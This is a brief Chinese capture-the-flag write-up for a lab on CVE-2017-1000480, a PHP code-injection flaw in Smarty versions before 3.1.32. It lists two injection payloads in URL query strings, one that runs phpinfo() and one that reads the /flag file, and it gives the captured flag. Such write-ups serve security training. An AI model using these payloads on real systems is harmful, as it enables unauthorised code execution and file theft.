春秋云镜 CVE-2017-1000480 Smarty <= 3.1.32 PHP代码执行漏洞
靶标介绍
3.1.32 之前的 Smarty 3 在未清理模板名称的自定义资源上调用 fetch() 或 display() 函数时容易受到 PHP 代码注入的影响。
启动场景
![在这里插入图片描述](https://img-blog.csdnimg.cn/b5c401d0f076494faa9ac05d47f9df93.png)
漏洞利用
poc
/index.php?eval=*/phpinfo();/*
![在这里插入图片描述](https://img-blog.csdnimg.cn/f785f143ae2a486db89a73e8165b1980.png)
/index.php?eval=*/readfile(%27/flag%27);/*
![在这里插入图片描述](https://img-blog.csdnimg.cn/870c718cb57143a0b61de7db850fd380.png)
得到flag
flag{d9c0af24-4b2f-4fcc-9bf4-3602c2bb8129}